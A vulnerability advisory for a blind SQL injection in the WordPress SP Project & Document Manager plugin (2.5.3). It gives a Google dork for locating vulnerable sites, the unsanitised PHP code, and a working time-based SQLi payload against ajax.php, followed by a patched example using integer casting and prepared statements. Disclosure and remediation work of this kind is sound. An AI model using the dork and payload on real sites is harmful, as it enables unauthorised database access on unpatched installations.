# Exploit Title: WordPress SP Project & Document Manager 2.5.3 Blind SQL Injection
# Google Dork: inurl:wp-content/plugins/sp-client-document-manager
# Date: 2015-03-04
# Exploit Author: catsecurity
# Vendor Homepage: http://smartypantsplugins.com
# Software Link: https://downloads.wordpress.org/plugin/sp-client-document-manager.2.5.3.zip
# Version: version 2.5.3 and previous versions
# Tested on: Chrome (It's a PHP application)
# CVE : N/A

# Timeline #

[2015.03.05] Reported to the vendor
[2015.03.06?] Fixed in update 2.5.4

# Details #

- This vulnerability exists because the plugin does not validate its integer parameters. Unauthenticated users can attack the websites that use this plugin.
- The vulnerable code is in the thumbnails() function, which exists in [ /wp-content/plugins/sp-client-document-manager/ajax.php ].
- The "pid" variable is not sanitized.

# Vulnerable code #

Line 1132: echo '';
Line 1133: if ($_GET['pid'] != "") {
Line 1134:     $r_current_project = $wpdb->get_results("SELECT * FROM " . $wpdb->prefix . "sp_cu_project WHERE id = " . $_GET['pid'] . "", ARRAY_A);
Line 1135: }

# POC #

/wordpress/wp-content/plugins/sp-client-document-manager/ajax.php?function=thumbnails&pid=[SQLi]

example:

/wordpress/wp-content/plugins/sp-client-document-manager/ajax.php?function=thumbnails&pid=if(substr(database(),1,1)=0x61,sleep(5),1)

If the condition is true, the response is delayed by 5 seconds.

This vulnerable parameter must be cast to an integer.
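The root cause and the fix the advisory calls for, written out as an added example (this is not the plugin's own code and not the vendor's patch). It shows the vulnerable lookup beside a hardened version that casts `pid` to an integer and binds it with `$wpdb->prepare()`. It assumes a loaded WordPress environment (the `wpdb` class, `absint()`, and `ARRAY_A` come from WordPress); the request parameters are passed in as an array instead of read from `$_GET` so both functions can be exercised in isolation, and the function names are hypothetical.

```php
<?php
// Added example, not the plugin's code: the vulnerable pattern from the
// advisory next to a hardened version. Assumes WordPress is loaded, so the
// wpdb class, absint() and ARRAY_A are available. "sp_cu_project" is the
// table named in the advisory; $get stands in for $_GET.

// Vulnerable form (mirrors ajax.php lines 1133-1134): the raw request value
// is concatenated into the SQL text, so whatever string a client sends
// becomes part of the query, including expressions such as a timing payload.
function sp_project_lookup_vulnerable(wpdb $wpdb, array $get): array {
    if ($get['pid'] != "") {
        return (array) $wpdb->get_results(
            "SELECT * FROM " . $wpdb->prefix . "sp_cu_project WHERE id = " . $get['pid'],
            ARRAY_A
        );
    }
    return [];
}

// Hardened form: reduce pid to a non-negative integer before any SQL is
// built, then bind it through $wpdb->prepare() with a %d placeholder so the
// final query text never contains client-controlled characters.
function sp_project_lookup_hardened(wpdb $wpdb, array $get): array {
    // absint() is WordPress's abs(intval()) helper: "7" becomes 7, while a
    // non-numeric string such as the advisory's PoC value becomes 0.
    $pid = isset($get['pid']) ? absint($get['pid']) : 0;
    if ($pid === 0) {
        // Missing, non-numeric or zero ids mean "no project"; the request
        // value never reaches the database.
        return [];
    }
    $sql = $wpdb->prepare(
        "SELECT * FROM {$wpdb->prefix}sp_cu_project WHERE id = %d",
        $pid
    );
    return (array) $wpdb->get_results($sql, ARRAY_A);
}
```

The integer cast is what the advisory asks for and is sufficient to close this injection, because the only value that can reach the query is a digit string; `prepare()` with `%d` is belt-and-braces that also keeps the query safe if the column type or the lookup is changed later. The advisory notes the endpoint is reachable by unauthenticated users, so a site fixing this in its own code should also confirm the ajax handler performs the capability or nonce check appropriate for the action, which is a separate issue from the injection itself.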